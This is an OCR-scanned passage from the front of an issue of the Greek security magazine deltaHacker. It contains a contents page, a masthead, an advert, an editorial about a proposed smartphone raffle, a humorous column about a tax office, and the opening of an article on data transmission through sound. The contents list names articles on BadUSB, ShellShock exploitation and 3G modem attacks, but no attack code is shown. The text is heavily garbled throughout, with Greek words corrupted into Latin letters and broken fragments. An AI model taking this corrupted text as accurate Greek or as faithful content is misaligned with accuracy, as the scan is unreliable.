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Το σοβαρο T 0 | 
ye To BadUSB [*] | 
To ShellShock bug και πώς δουλεύει 

y ProxyChains-NG, για ασφαλές pen-testing 


Υποκλοπή ευαίσθητων δεδοµένων µέσω SMS 
Μετάδοση δεδοµένων µέσω ηχητικών κυμάτων 


li [*] ...KQI παράδειγµα εκμετάλλευσής του! 


Sliced bread και µια πρόταση προς συζήτηση 


H απάντηση στο αγωνιώδες ερώτημα 
για το "τζι TQ" των τζιτζικιών 


η μουρμούρα [μέρος 1] 


Ασύρματη μετάδοση δεδοµένων, 
αλλά µέσω ἤχου! 


Μεταφορα κλοπιµαίιων µε 


Επίθεση σε broadband 3G modems 
και υποκλοπή ευαίσθητων 
δεδοµένων µέσω SMS 


θεια του Βας 


Το εξαιρετικά επικίνδυνο BadUSB 
και βήμα προς βήμα επίδειξη επίθεσης 
για την απενεργοποίηση του antivirus 


Ὅταν οι µηχανες αρχιέουν 
τη μουρμούρα [μέρος 2] 


Η ηχητική επικοινωνία µέσω δύο υπολογιστών 
έχει επιτευχθεί και τώρα προχωράμε 
σε πιο σύνθετα σενάρια! 


ὀιαταραχη 


Γιατί το ShellShock bug εἶναι πιο σοβαρό 
από To Heartbleed και 
επίδειξη εκμετάλλευσής του 


nmap δι ProxyChains-NG: 


Scanning στο Internet, καλυμμένα 
http://deltahacker.gr/?p=12454 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Γιώργος Αραβίδης, Παναγιώτης Βαρελάς, Χρήστος 


Βαρελάς, Ανδρέας Βενιέρης, Γιώργος Γιάννου, Μανώλης 
Κιαγιάς, Ιωάννης Κονιάρης, Πέτρος Κυλαδίτης, Γιῶργος 
Μελέκος, Νίκος Μουρατίδης, Θωμάς Σερµπίνης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Τόμπρας 


Γραμματικἠ επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικό και εκδίδεται and την Par- 
abing Creations δώδεκα φορὲς το χρόνο, κἆθε µήνα. H Parabing Creations έχει την 
έδρα της στην Καλαμαριά Θεσσαλονίκης. O δικτυακός τόπος του περιοδικού εἶναι στο 

. Το email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικἁ 
για τις συνδρομές εἶναι το subscriptions@deltahacker.gr. Οι γενικές πληροφορίες για τις 
συνδρομὲς παρατίθενται στο και οι ἴδιες οι παραγγελἰες 
γίνονται απὀ το - Όλες οι απόψεις που εκφράζονται στα 
άρθρα δεν εκφράζουν απαραἰτητα και τη γνώμη του περιοδικού. 


YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQ/oud's cloud 
services powered by abundant, stable and cost effective, clean energy 


e Up to 16 CPUs and 32gb RAM e Network separation at the 
in the KVM hypervisor hardware level 


O 


* 64-bit server image templates “ Dedicated IP address and 
including Ubuntu, Debian, reserved bandwidth 


FreeBSD, CentOS and more 
e EC2 compatible 


ComputeQloud™ * Built-in firewall 
Host & Manage e Instant scalability 
* In-browser noVNC client and ᾿ 
full root access via ssh e Online dashboard 


Ον 


e Triple-redundant storage . S3 compatible 
e Full encryption e Bucket websites 
StorageQloud™ e Sync across all platforms e Automatic load-balancing 


Backup & Share 


For more information visit our webiste: www.greenqloud.com 


H aAAayn ἐχει συντελεστεἰ εδώ και πολύ καιρὀ: O σημαντικότερος 
υπολογιστής που ἐχουμε σήμερα, αυτός για τον οποίο ὅλοι νοιάζο- 
νται και τον λατρεύουν κι Ooo! δεν τον ἐχουν κάνουν τ' αδύνατα 
δυνατὰ για να τον αποκτήσουν, εἶναι GUTOG που χωράει στην τσέπη 
μας και τον έχουμε διαρκώς μαζί µας. 


by subZraw 


Εντάξει, ως αναγνώστες του περιοδικού deltaHacker σίγουρα δεν σας αρὲ- 
gouv μόνο τα smartphones -- γιατὶ περὶ αυτών εἶναι ο πρόλογος. Πώς να το 
κάνουμε, χρειάζεσαι vav "κλασικό" υπολογιστή ἠ/και laptop για να npo- 
γραμματίσεις, να πειραματιστεἰς ἄνετα µε το pen-testing, να στήσεις τους 
φυσικούς ἠ/και τους EIKOVIKOUG σου servers, να σχεδιάσεις κυκλώματα, να 
ερευνήσεις, να μελετήσεις κ.λπ. Αλλά ξέρετε κάτι; Οι κλασικοί υπολογιστές, 
τα laptops -un σας πούμε ακόµη και Ta tablets-, γρήγορα γίνονται old news 
κι ano va σηµεἰο και µετά δεν υπάρχουν πολλά να σκεφτείς ἡ να συζητἠ- 
σεις. Απλά, έχεις τον υπολογιστή σου και τον χρησιμοποιείς για δουλειά ἠ/ 
και για διασκέδαση, ὁμως γρήγορα αυτὸς "υποβαθμίζεται" στην κατηγορία 
"εργαλείο". Ένα εργαλείο το οποίο, αν και απείρως πιο περἰπλοκο και συναρ- 
παστικὀ ano Eva κατσαβίἰδι, δεν μπορεί v' αποτινάξει εντελώς απὀ πάνω του 
τη ρετσινιἁ του "απλού εργαλείου". 


Δεν εἶναι kako αυτὀ. Δηλαδή ωραία εἶναι ν' ασχολείσαι µε τους υπολογι- 
OTEG μόνο και μόνο επειδἠ εἶναι υπολογιστές, αλλά ακόµη πιο ωραία εἰναι 
να τους χρησιμοποιείς για να πετυχαίνεις συγκεκριµένα αποτελέσµατα - ἡ 
ἑστω να προσπαθεἰς να τα πετυχαίνεις. AUTO ἄλλωστε κάνουμε και στο NE- 
ριοδικὀ. Σκεφτείτε το. Στα θέματα που KGAUNTOUHE εἰτε δείχνουμε NWG δου- 
λεύουν τα πράγματα (η δικτύωση µε βάση το TCP/IP, το Heartbleed bug, 
η μετάδοση δεδοµένων µέσω ηχητικών κυμμάτων κ.ἀ.), EITE πώς λύνουμε 
συγκεκριµένα προβλήματα (διατήρηση της ανωνυμίας στο Internet, απὀκτη- 
ση απομακρυσμένης πρόσβασης σ' Eva σύστημα, στήσιμο Evoc cloud-based 
storage system κ.ἁ.). Τώρα, το αν χρησιμοποιούμε PC ἡ Mac, το αν ο uno- 
λογιστής Exel διπύρηνη CPU µε hyper-threading ἡ πραγµατικἀ τετραπύρηνη 
CPU κ.λπ., ναι pev ¿xouv τη σημασία τους ανάλογα µε την περίπτωση ἡ το 
πρότζεκτ, αλλά σίγουρα δεν αποτελούν τα πρωτεύοντα ζητήματα. 
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Τα πρωτεύοντα ζητήματα, αγαπητὲς κι αγαπητοί, αφορούν στο NWG και στο 
γιατί. O υπολογιστής εἶναι το µέσο κι αν αυτός που ἐχουμε δεν εἶναι ο καταλλη- 
λότερος για µια δουλειά, τότε ciTe τον αναβαθμµἰζουµε EiTE τον αντικαθιστούμε 
και πολύ γρήγορα επιστρέφουµε στο πώς ἠ/και στο γιατὶ. AUTO θα πει πρὀοδος 
της τεχνολογίας - και δεν το λέμε καθόλου ειρωνικά. 


Μια τέτοια συζήτηση εἰχαμε προσφάτως µε τον κο Αρχισυντάκτη (TM) του 
περιοδικού, ὁπου μεταξύ ἄλλων παρατηρούσαμµε πὀσο πολύ αλλάζει η κουβὲ- 
ντα ὁταν αντἰ για υπολογιστὲς ἡ laptops, αρχίζουμε να μιλάμε για smartphones. 
Δεν θα διαφωνήσει κανείς ὁτι *kai* τα smartphones μᾶς βοηθούν καθημερινά 
να παράγουµε συγκεκριµένα αποτελέσµατα. Δύσκολα όμως μπορεἰς να xapa- 
κτηρἰσεις TO smartphone we Eva απλὀ εργαλείο. Διαφωνούμε επἰσης κάθετα κι 
οριζόντια και γενικά ως προς οποιαδήποτε διεύθυνση της τετραδιάστατης (;) 
πολλαπλότητας που βιώνουμε ως χωροχρόνο, µε την ἄποψη που λέει "μην τρε- 
λαίνεστε, ¿va απλὀ τηλέφωνο εἰναι" ("it's just a phone", ὁπως χαρακτηριστικἁ 
σχολιάζουν και στο Λευκαντὶ Ευβοίας, απ' ὁπου κατάγονται αρχισυντάκτης και 
γράφων). Δεν ξέρουμε, αλλά για τα δικἁ µας μάτια -και κατά NOG φαίνεται και 
για τα μάτια πολλών χρηστώὠν-, Eva smartphone δεν εἶναι " µόνο va τηλὲ- 
φωνο". Το εντελώς αντίθετο: Εἶναι ἑνας πλήρης υπερ-φορητὀς υπολογιστής, 
ο οποίος τυχαίνει va ἐχει *kal* δυνατότητες τηλεφώνου. Και δεν φτάνει μόνο 
auto: H σχέση του κατόχου ενὸς smartphone HE TN συσκευἠ του εἶναι σχεδόν 
ερωτική - πάντα µε την καλἠ έννοια. O χρήστης ενὸς smartphone, πολύ πιο 
συχνά απ' ὁσο παραδέχεται δημόσια, το χρησιμοποιεὶ μόνο και μόνο επειδἠ εἰ- 
ναι smartphone! Καμαρώνει για τα τεχνικά του χαρακτηριστικά, χαίρεται για τη 
μεγάλη, PWTEIV και µε ζωηρά χρώματα οθόνη του, πωρώνεται µε την υπερ-υ- 
WNAN της ανάλυση, παἰρνει μεγάλη χαρά ano τις δυνατότητες της κάμερας, δεν 
χάνει ευκαιρία να δείχνει πόσο responsive εἶναι η συσκευή και, βεβαίως, EXE! 
ἄπειρα επιχειρήματα που αποδεικνύουν ὁτι το λειτουργικὀ σύστημα του δικού 
του smartphone εἶναι "the greatest thing since sliced bread" (GAAn µια ἑκφρα- 
ση που συνηθίζεται στο Λευκαντὶ - της Ευβοίας, φυσικὰ). 


"Pe 'σύ, ξέρεις κάτι;'', πέταξε κάποια στιγµἠ εντελώς απροειδοποἱητα ο κος 
Αρχισυντάκτης (TM), "Eva smartphone πρέπει να κληρώσουμε". Πριν προλάβω 
να πω οτιδήποτε, µε αποτέλειωσε: "Όχι ὀποιο να ναι. Το νόουτ, το φορ." Τώρα, 
στο σημείο αυτὀ και πριν πούμε οτιδήποτε ἄλλο, θα ἠθελα να καταγραφεἰ στα 
πρακτικά ότι ενώ cya προσπαθώ να εἶμαι OS agnostic *kai* Ooov αφορά στα 
λειτουργικἀ των smartphones, ο κος Αρχισυντάκτης (TM) εδώ κι αρκετούς 
μήνες EXE] μετατραπεί, στα χνάρια της Συμβούλου Εκδόσεως (TM), σε major 
Android supporter! Δεν ἦταν πάντα τέτοιος, ὁμως δεν εἶναι αυτὀ το θἐµα µας. 
Το θέμα µας, αγαπητὲς κι αγαπητοί, εἶναι ὁτι Το Galaxy Note 4 εἶναι πανέμορ- 
φο (το εἶδα τέλη Οκτώβρη ano κοντά, ἐπαιξα λίγο κι ομολογώ ότι πωρώθη- 
κα), ὅμως παραείναι ακριβὀ για τις οικονομικὲς µας δυνατότητες. Επιπρὀσθετα, 
όπως ὁλοι οι παλιοἰ συνδρομητές γνωρίζουν, γενικἁ δεν παϊζουν σπόνσορες 
για το περιοδικὀ. Αν λοιπὀν εἶναι va κληρὠσουμε το Note 4, τότε µε κάποιον 
τρόπο θα πρέπει να το πληρώσουμε οι ἰδιοι. Όλα αυτά τα γνωρίζει πολύ καλά 
ο κος Αρχισυντάκτης (TM), οπὀτε καταλαβαίνετε την anopia µου όταν ἄκουσα 
την καθ' ὁλα σοβαρἡ πρὀτασἡ του περὶ της κληρώσεως. Του ζήτησα, λοιπὸν, va 
µου εξηγἠσει τι ακριβώς εἰχε KATA νου. 


Και pou εξήγησε. 


Οι λεπτομέρειες της συζήτησης που ακολούθησε μπορούν να παραλειφθούν. Θα 
σας πω ὁμως, επιγραμματικά, σε τι ἐχουµε καταλήξει προς το παρὀν. Και λέω "προς 
το παρὀν", διότι πριν κάνουμε KATI -av κάνουμε οτιδήποτε- θα θέλαμε ν' ακούσουμε 


και τις δικὲς σας σκἐψεις/ιδἑες/ενστάσεις. Στη συνέχεια χρησιμοποιώ bullets, ὥστε 
να εἶμαι κατὰ το δυνατὸν σαφἠς. 


ο Θέλουμε να συμμετάσχουν λίγοι στην κλήρωση. Πα την ακρἰβεια, σκεφτὀ- 
μαστε για 10 συμμετέχοντες μόνο. Ναι, δεν πρὀκειται για τυπογραφικὀ λά- 
θος. Δέκα. Έτσι, η πιθανότητα να κερδίσει κἀποιος το Galaxy Note 4 θα εἶναι 
1 προς 10 ακριβώς. 


ο ΟΙ 10 που θα λάβουν μέρος στην κλήρωση θα επιλεγούν µε σειρὰ προτε- 
ραιότητας. Πα την ακρίβεια, θα φτιάξουμε µια λίστα στο MailChimp και οι 
πρώτοι 10 που θα γραφτούν στη λίστα θα λάβουν μέρος στην κλήρωση. 


ο Όσοι συμμετάσχουν στην κλήρωση θα πρέπει να πάρουν Lifetime 
subscription στο περιοδικὀ, µε ἑκπτωση λίγο πάνω ano 26%. 


ο Ano τα χρήματα που θα μαζευτούν θα αγοράσουμε To Note 4 και, ano τη 
στιγμὴ που ούτως ἡ ἄλλως θα δώσουμε 10 Lifetime subscriptions (συνδρο- 
μὲς εφ ὀρου ζωής), για το κἐρδος του περιοδικού θέλουμε µόνο το μισὸ του 
συνολικού κόστους όλων αυτών των συνδρομών (αφού λάβουμε υπόψη την 
ἐκπτωση). 


ο Ας γίνουμε τώρα πιο συγκεκριμένοι - µε νούμερα. To Galaxy Note 4 κοστίζει 
849 ευρώ. Θέλουμε να συγκεντρώσουμε 23849 = 1698 ευρώ, τα μισά ano 
τα οποἰα θα τα δώσουμε για την αγορά του smartphone. Καθένας ano τους 
10 συμμετέχοντες, λοιπὸν, δίνει 1698/10 = 169,80 ευρώ και: 


1. αποκτὰ αυτομάτως συνδρομὴ εφ ὁρου ζωὴς στο περιοδικὀ µε ἐκπτωση 
26,17% (το κανονικὀ κόστος εἶναι 229,99 ευρώ) 


2. λαμβάνει μέρος στην κλήρωση για To Galaxy Note 4 γνωρίζοντας ὁτι η 
πιθανότητα επιτυχίας εἶναι τακριβώςΞ 1 προς 10. 


3. Σε εμάς μένουν 1698-849 = 849 ευρώ, τα οποία εἶναι η μισή αξία των 10 
συνδρομώὠν εφ ὀρου ζωής που θα έχουμε NON δώσει. 


Έχουμε σκεφτεί και πώς ακριβώς θα γίνει η κλήρωση για τους 10 συμμετέχο- 
ντες. Όμως αυτό το λέμε αν κι εφόσον κάνουμε την ὀλη κίνηση. Προς το napov, θα 
θέλαμε τα σχόλιά σας (κάτω απὀ το http://deltahacker.gr/?p=12471, WOTE να εἶναι 
όλα συγκεντρωμένα στο ἰδιο μέρος). Ενδιαφἐρεστε; Να προχωρήσουμε µε την κλἠ- 
ρωση; Υπάρχει κάτι που θα μπορούσαμε ἡ θα έπρεπε να κάνουμε διαφορετικά; Πώς 
σας Φαίνεται αυτὀ το 1 προς 10; Υπογραμμίζουμε ότι η κλήρωση δεν µπορεί να εἶναι 
ανοιχτἠ για όλους (δεν ἐχουμε σπὀνσορα για τη συσκευἠ). Από την ἄλλη όμως, οι 
πιθανότητες επιτυχίας για τους συμμετέχοντες εἶναι εξωπραγματικἁ μεγάλες - XW- 
pia που Ἐόλοιᾶ τους αποκτούν συνδρομὴ εφ ὁρου ζωής στο περιοδικὀ (περιλαμβάνει 
και όλα τα προηγούμενα τεύχη), µε EKNTWON 26,17%. 


"Your comments will be much appreciated", ὁπως θα ἐλεγε οποιοσδήποτε ano 
το Λευκαντὶ (της Ευβοίας). 


Η ηλεκτρονική EKOOON του deltaHacker δεν 


EXE] καμία σχέση µε ότι έχετε δει ως τώρα. 


Είναι portable καὶ searchable = 


Επιτρέπει την κι ΘΥΤΝΡ g κειµένου, αλλά και 
την EKTUNWON. 


Είναι w~rAAs qorernr-as Και δείχνει τέλεια παντού: 
στο tablet, στο smartphone και φυσικά στον υπολογιστή. 


A! η ηλεκτρονική EKOOON του deltaHacker 


δεν φέρει τεχνητούς περιορισμούς και 
δεν τιμωρεί τον κἀτοχό της, 


Στηρίξτε Τη δουλειά μας κι επιτρέψτε µας να τη 
συνεχίσουμε, 


Φ 
Αποκτήστε τωρα μία απὀ τις ηλεκτρονικές 
συνδρομές στο Περιοδικό deltaHacker. 
Κι εσείς. 


http://deltahacker.gr/odf12order 
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OVELA peur 


Αγαπητοί µου, 

Κανονικά θα έπρεπε να ξεκινήσω από το τζν τζν. Αλλά, συµπαθάτε pe, 
OTL θα περνούσα χρονιάρες μέρες το πρωινό µου στην αίθουσα αναμονής 
της υπηρεσίας Μητρώου της τοπικής µας Εφδρίάς, αυτό δεν το περίμενα. 
Έχω μπερδευτεί. “Fi z 

(Χρονιάρες λόγω των γενεθλίων. Tr "ποιῶν γενεθλίων") 

Εφορία. Δεν έχω έρθει για δικιά µου δουλειά, φτου-φτου-φτου μη µε 
ματιάσω. Μακριά από μένα τέτονα TUT. Στην εξαδέλφη έχω έρθει να συ- 
μπαρασταθώ, γιατί EXEL κάτι τρεχάματα µε τη δήλωση της μητέρας της, τον 
EN@IA, το E9, το EIJ και δεν ξέρω 'γώ nolo άλλο E. 

E γητέρα της εξαδέλφης, βέβαια, καθώς εἶναι Ινδουίστρια, το έχεν πάρεν 
χαλαρά. KOLTGCEL τον εφοριακό λες καν είναι μετεμφύχωση του Βούδα. 

(E μητέρα της εξαδέλφης, OX’ ο εφοριακός.) 

Αντίθετα µε τη μητέρα της, η εξαδέλφη από δίπλα δεν είναι καθόλου 
Ινδουίστρια, καν δείχνεν να το EXEL πάρεν πιο προσωπικά. Όπου να 'ναν, 
εντούτοις, θ' αρχίσει κι αυτή να ανωρείται. 

Τέλος πάντων. Ἡ αίθουσα είναν χλωμή καν κρύα χι εγώ έχω καθίσει σε 
PLAV άκρη, δίπλα από τη συσκευή εκείνη µε τα χαρτάκια µε τους αὔξοντες 
αριθμούς, που τα παίρνεις για να ξέρεις πότε θα εξυπηρετηθείς. 

Ωραία συσκευή και πολύ χρήσνµη. Γνα την ουρά. 

Αλλά δε λειτουργεί. 

Unsurprisingly. 

Δεν λειτουργούσε ούτε τον Αύγουστο που είχαμε ξαναέρθει στην (ίδια) 
εφορία, εκείνη τη φορά µε TOV ανιφνό. Νομίζω, μάλιστα, πως ποτέ δεν λει- 
τούργησε. Μοιάζει να έχει εγκατασταθεί εκεί ως έργο τέχνης, αφιερωμένο 
στην µαταιότητα TOV βίου καν το φευγαλέον της ζωής. Σαν Καρυάτιδα ένα 
πράγμα. 

Εφορία σου λέεν ο άλλος. 

Με τον αννφνό είχαμε ἔρθεν "δν' νπόθεσίν τον". 

Καλά, ήταν απίστεντη εμπειρία. Προσπαθούσε ο ανιφιός να τους πείσει, 
τους της εφορίας, πως είναν φορολογυκός κάτοικος εξωτερικού -- που εί- 
Val, βέβαια, γνατί να το κρύφωμεν άλλωστε; 

Μπα. Με τίποτα. 

Αυτός βέβαια είχε έρθει ενημερωμένος, µε το VEO νόμο που "απλοπονεί 
τις δναδικασίες", καν νόμιζε πως είχε λύσει το πρόβλημά του. Φευ... 

O νόμος είχε πράγματι απλοποιηθεί ως προς το σκέλος που αφορούσε 
τον καθορισμό "των δικανολογητικών που υποβάλλουν τα φυσικά πρόσωπα 
που δηλώνουν κάτοικοι εξωτερικού". Ta πράγματα έχουν απλουστευτεί γνα 
τα φυσικά πρόσωπα πον δηλώνουν ŽAN πάτοικοι εξωτερικού -- αλλά ὀχν 
για τα άλλα πρόσωπα που δεν δηλώνουν αλλά θα ἡθελαν να δηλώσουν κά- 
τοικον εξωτερικού για πρώτη φορά. 

Ένα τέτοιο φυσικό πρόσωπο είναι O ανιφιός. 

Τέλμα. Αδιέζοδο. Τέλος πάντων, να µην τα πολυλογώ, δεν τα κατάφερε. 
Μάλιστα, επειδή επέμενε, κάπουα στιγμή πήγε να βρει καν το µπελά TOV. 
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Παραθέτω εδώ τον διάλογο για τον ιστορικό TOV μέλλοντος. 

"ELOTE κάτοικος εξωτερικού, κύριε; Δουλεύετε στο εξωτερικό; Έχετε EL- 
σοδήματα»", τον PUTGEL ο υπάλληλος της εφορίας. Δυέκρννα έναν θριαµΡευ- 
TLHO σπινθηρνσµό στο βλέμμα του. 

"Μάλιστα, αυτό δεν σας λέω τόση ώρας", βιάστηκε να επιβεβανώσεν ο 
ανιυφνός. 

"Αν είναν έτσι, γνατί δεν έχετε δηλώσει τα ενσοδήµατά σας αυτά στις 
πρόσφατες φορολογικές σας δηλώσεις; Δεν µπορεί να γίνει µεταβολή φορο- 
λογικής έδρας αν έχετε φορολογικές εκκρεμότητες." 

"Ma, δεν έχω εκκρεµότητες...', εἶπε µε ελαφρό άγχος ο ανιφιός, ενώ εγώ 
ἔκλεννα το παπάκι της Υραφομηχανής KL ετοιμαζόμουν να τον φυγαδέφω. 

"Ἔχετε, πύριε", τον πατακεραύνωσε ο εφοριακός. "Μου λέτε OTL υπάρχουν 
εισοδήματα στην αλλοδαπή, καν τα εισοδήματα αυτά δεν έχουν δηλωθεί στην 
Ελλάδα." 

"Μα... Μα τα δηλώνω στην Αγγλία. Exel ζω. Από αυτά τα εισοδήματα ζω", 
Φέλλισε ο ανιφιός. ΕΥώ στεκόµουν ἥδη πίσω του. 

"OXL, κύρνε. Δεν είστε κάτοικος της Αγγλίας. Κάτουκος Ελλάδας είστε. 
Γνα την εφορία είστε κάτοικος Ελλάδας. Τακτοπονήστε λοιπόν αυτή την εκ-- 
πρεµότητα, δηλώστε τα πλήρη εισοδήµατά σας για τα τελευταία πέντε χρό- 
VLG αναδρομικά, KAL µετά ελάτε εδώ σε 'μένα να κάνουμε καν τη µεταφορά 
της έδρας." 

O ανιφνός έμεινε άφωνος PE την εξυπηρετικότητα του υπαλλήλου. Φοβή- 
θηκα OTL θα πάθεν αποπληξία xt έτσι τον πήρα παράμερα, τον βόηθησα va 
μαζέφεν όλα τα χαρτιά που είχε σκορπίσει εδώ κι εκεί, καν γρήγορα γρήγο- 
ρα φύγαμε σκυφτοί. Φοβόμουν πως θα µας σταματήσει η φορολογική αστυ- 
voia στην έξοδο, αλλά δεν Eberle να ενδιαφέρεται κανείς. 

To θέµα του εκκρεμεί -- και μάλλον θα εκκρεμεί επ' αὀριστον. 

EH εμπειρία, ωστόσο, ήταν για μένα αποκαλυπτική. 

Ἠταν το καλύτερο παράδειγµα για κάτι που είχε τύχεν εκείνες τις ηµέρες 
να διαβάζω. 

Μιλάω γνα το "Κράτος καν Οµάδες Συμφερόντων", του Χρ. Ιορδάνογλου. 
Αν δεν το έχετε υπόφη σας, το συνιστώ ανεπυφρύλακτα, 

θα σας βοηθήσει να δείτε κάτν απλό. θα σας βοηθήσει να δείτε, µε απλές 
παν καθαρές γραμμές, πού συνίσταται η ιδιαιτερότητα της ελληννκής δημό- 
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σνας διοίκησης ή, γνα να το πω καλύτερα, του Ελληνικού Κράτους *yEVLHa. 

Λοιπόν, το πρόβλημα δεν EYHELTAL στο OTL OL δημόσιον υπάλληλον είναν 
άχρηστοιν ἡ καχοπληρωμένου ἡ πάρα πολλοί ἡ πάρα πολύ λίγον. Τίποτα απ' 
όλα αυτά. Όταν η συζήτηση τίθεται µε τέτονους όρους, τίθεταν σε λάθος 
βάση. 

Τα καίρνα χαρακτηριστικά της ελληνικής δημόσιας διοίκησης, λέενο 
Τορδάνογλου, είναι τρία. Αντιγράφω από τις σελίδες 24-25: 

"a) H ελληνική δημόσια διοίκηση δεν είναι δομημένη στη βάση της πα- 
ραγωγής αποτελεσμάτων. Είναι δομημένη για να τηρεί τις διαδικασίες που 
προβλέπονται απὀ τους νόμους και τους κανονισμούς. TO όποιο παραγόμενο 
αποτέλεσµα είναν υποπροϊὀν της τήρησης οδηγνών καν υποτίθεται OTL EXEL 
προβλεφθεί από το σχεδιαστή των οδηγνών. Δεν αφορά τη διοίκηση. E ἴδια η 
ἔννοια της παραγωγής προϊόντος για κάποιον χρήστη, τῆς εἶναι ξένη." 

"B) Δεν υπάρχεν σαφής επιμερισμός της ευθύνης ως προς το ποιος ανα- 
λαμβάνει την τάδε ἡ τη δείνα αποστολή. Καν δεν υπάρχεν έλεγχος για το av 
καν πόσο καλά το αναληφθέν έργο υλοποιήθηκε." 

"γ) O μηχανισμός κινήτρων και κυρώσεων στο δημόσιο τομέα είναν εξαν- 
ρετυκά χαλαρός. Ον αποδοχές, ον εξελίξεις, ον μεταθέσεις είναν στην ουσία 
αποσυνδεδεµένες απὀ κάθε έννοια απόδοσης του υπαλλήλου." 

Κ.λπ. Κ.λπ. Κ.λπ. PLYTE PLA ματιά στο βιβλίο αυτό, αγαπητοί pov, χάρη 
στον εαυτό σας θα κάνετε. Βίναν πρόσφατο, ολιγοσέλιδο καν αρκετά. φτηνό. 

Όλα óda λέεν είναν απλά, εύστοχα XL εύλογα. Τόσο, ώστε μοιάζουν αυτο- 
νόητα. 

Αλλά, όπως θα θυμούνται όσον διαβάζουν αυτά που γράφω καν ξαναγρά- 
φω στις επιστολές μου κάθε μήνα, ουδέν αυτονόητον. 

E μεγαλύτερη παγίδα της σκέφης είναν η παγίδα τον "αντονόητον". 

Αυτή, καθώς καν η σύγχυση της χρονικής µε την αντνακή συνέχεια, TO 
"post hoc ergo propter hoc", που σας έλεγα την περασμένη φορά. 

Έθελα να επανέλθω στο θέµα εκείνο, αλλά µε όλα τούτα τα εφορνακά τε- 
λείωσε O χρόνος. 

Πριν κλείσω, λουπόν, θα σας μιλήσω για τα τζυτζίκνα. 

"Ακούγεται TO TOL τζιν των τζυτζυκνών αν δεν είμαστε εμείς εκεί να το 
ακούσουμεφ" 

Λοιπόν, η ώρα έφτασε και θα το NAPEL το ποτάμι. 

Όχν. Δεν ακούγεται. 

Καν το γράφω αυτό έχοντας πάσαν επίγνωση των συνεπειών του νόμου. 

Τα τόντζίκνα, φυσικά, δεν περίμεναν εμάς για να κάνουν τζν τῶν ἡ ό,τι 
άλλο κάνουν. Στην πραγματικότητα, δεν κάνουν κάν τζν τῶν. Τα τζντζίκνα 
κάνουν αυτό που κάνουν -- καν το κάνουν για λόγους που τα ἴδια ξέρουν. 

Εμείς είμαστε που περιγράφουµε την δραστηριότητά. τους ως τῶν τόν. Ke 
όταν ρωτάω γνα το αν ακούγεται TO τζν τῶν ἡ ὀχν, στην ουσία ρωτάω για το 
αν υπάρχουν µέτοχον του ανθρώπινου πλαισίου ερµηνείας. Μόνο γν' αυτούς 
είναν TOL TOL καν μόνο Υν' αυτούς ακούγεται. 

Αν val, Vale Αν ὀχν, ὀχν. 


Σας ασπάζομαν 
θείος Ακάκνος 


ΥΓ. Μα, το συνειδητοπονείτε OTL το έγκριτο περιοδικό µας εισέρχεται 
αισίως στην τέταρτη χρονιά της ζωής του; Γουάου. Well I never. 
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Όταν οι μηχανές αρχίζουν τη μουρμούρα [μέρος 1ο] 


H AdLib ἦταν η πρώτη κάρτα ἠχου για τα PC κι OTav κυκλοφόρησε έφερε τα 
πάνω κάτω, δίνοντας επιτέλους φωνή στα βαρετά μπεζ κουτιά. Έκτοτε οι κάρτες 
ἠχου έχουν εξελιχθεί περισσότερο απὀ εντυπωσιακά, ενώ πλέον αποτελούν 
αναπόσπαστο εξάρτημα ὅλων των υπολογιστών -- εἶτε µε τη µορφή ενός 
κυκλώματος στο chipset εἶτε σαν ξεχωριστή κάρτα επέκτασης. Τι θα λέγατε av 
χρησιμοποιούσαμε αυτά τα εξελιγμένα κυκλώματα για κάτι εντελώς άσχετο µε 
την αποστολή τους; Πώς θα σας φαινόταν αν αξιοποιούσαμε τις κάρτες ἠχου, για 
την επικοινωνία µέσω ηχητικών σημάτων; 


Όταν οι μηχανές αρχίζουν τη μουρμούρα [μέρος 1ο] 
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Ὅσοι ἐχουν ζήσει την εποχἠ που ο παγκόσμιος ιστὸς ¿kave τα πρὠτα του βήματα 
-ἡ και ακόµη παλιότερα, την εποχἠ των BBS-, εἶναι σίγουρο OT! θυμούνται πολὺ 
καλά τον ἦχο που ἑκαναν τα αναλογικἁ modems, κατὰ τη διαδικασία εγκαθίδρυσης 
µιας σύνδεσης. Ta modems της εποχἠς επέτρεπαν τη σύνδεση ενὸς υπολογιστή 
µε το διαδίκτυο, µέσω των αναλογικὠν τηλεφωνικών γραμμών. Περιττό να πούμε 
ότι η χρήση τους αποτελούσε μονόδρομο για τους κατόχους υπολογιστών avd την 
ελληνική επικράτεια. Οι ἦχοι που ακούγονταν στα πρὠτα στάδια της σύνδεσης δεν 
ἡταν τίποτε ἄλλο παρὰ η αρχικἠ επικοινωνία, το λεγόμενο handshake, του δικού 
μας modem µε ekeivo που βρισκόταν στην ἄλλη ἄκρη της τηλεφωνικἠς γραμμἠς. 
Μετὰ την επιτυχἠ σύνδεση οι ἦχοι ἐπαυαν αλλά μόνο για τα δικἀ µας αφτιά: To 
modem απενεργοποιούσε το ηχείο του ωστόσο συνέχιζε να επικοινωνεὶ "ηχητικά". 
Πράγματι, αν κατὰ τη διάρκεια της σύνδεσης σηκώναμε το ακουστικὀ του τηλεφώ- 
νου, διαπιστώναμε ὁτι οι ἦχοι συνεχίζονταν κανονικἀ. Αυτοί οι ἦχοι μετέφεραν τα 
δεδομένα που αντάλλασσαν ακατάπαυστα τα δύο modems (το δικό µας κι εκεἰνο του 
ISP). Ουσιαστικά, τα Modems μετέτρεπαν τους ἦχους σε ψηφιακά δεδομένα και TO 
αντἰστροφο. Ano αυτή την εργασἰα που επιτελούσαν NPOEKUWE και TO ὀνομά τους 
(MOdulator-DEModulator). Στην εποχἠ Tou DSL, οι τηλεφωνικὲς γραμμὲς εἰναι πλέον 
Ψηφιακές κι EKTOG απὀ τη φωνή μπορούν να μεταφέρουν *kai* δεδομένα. Έτσι, τα 
DSL modems αντικατέστησαν τα αναλογικἀ, φωνακλάδικα modems, ενώ ἐγιναν κι 
αὁρατα, καθώς ενσωματώθηκαν σε συσκευὲς που προσφέρουν τις λειτουργίες ενὸς 
